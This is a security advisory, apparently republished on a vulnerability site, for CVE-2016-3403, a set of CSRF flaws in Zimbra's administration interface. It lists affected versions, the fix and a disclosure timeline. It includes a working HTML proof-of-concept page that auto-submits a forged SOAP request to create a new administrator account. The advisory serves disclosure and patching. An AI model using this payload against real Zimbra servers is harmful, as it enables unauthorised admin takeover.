Zimbra Cross Site Request Forgery

2017.01.14
Credit: Sysdream
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# CVE-2016-3403: Multiple CSRF in Zimbra Administration interface ## Description Multiple CSRF vulnerabilities have been found in the administration interface of Zimbra, giving possibilities like adding, modifying and removing admin accounts. ## Vulnerability Every forms in the Administration part of Zimbra are vulnerable to CSRF because of the lack of a CSRF token identifying a valid session. As a consequence, requests can be forged and played arbitrarily. **Access Vector**: remote **Security Risk**: low **Vulnerability**: CWE-352 **CVSS Base score**: 5.8 ## Proof of Concept ```html <html> <body> <form enctype="text/plain" id="trololo" action="https://192.168.0.171:7071/service/admin/soap/CreateAccountRequest" method="POST"> <input name='<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context xmlns="urn:zimbra"><userAgent xmlns="" name="DTC"/><session xmlns="" id="1337"/><format xmlns="" type="js"/></context></soap:Header><soap:Body><CreateAccountRequest xmlns="urn:zimbraAdmin"><name xmlns="">itworks@ubuntu.fr</name><password xmlns="">test1234</password><a xmlns="" n="zimbraAccountStatus">active</a><a xmlns="" n="displayName">ItWorks</a><a xmlns="" n' value='"sn">itworks</a><a xmlns="" n="zimbraIsAdminAccount">TRUE</a></CreateAccountRequest></soap:Body></soap:Envelope>'/> </form> <script> document.forms[0].submit(); </script> </body> </html> ``` ## Solution * Upgrade to version 8.7 ## Affected versions * All versions previous to 8.7 ## Fixes * https://bugzilla.zimbra.com/show_bug.cgi?id=100885 * https://bugzilla.zimbra.com/show_bug.cgi?id=100899 ## Timeline (dd/mm/yyyy) * 24/02/2016: Issue reported to Zimbra * 24/02/2016: Issue aknwoledged * 20/06/2016: complete fixes released with version 8.7 ## Credits * Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail -dot- fr) * Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top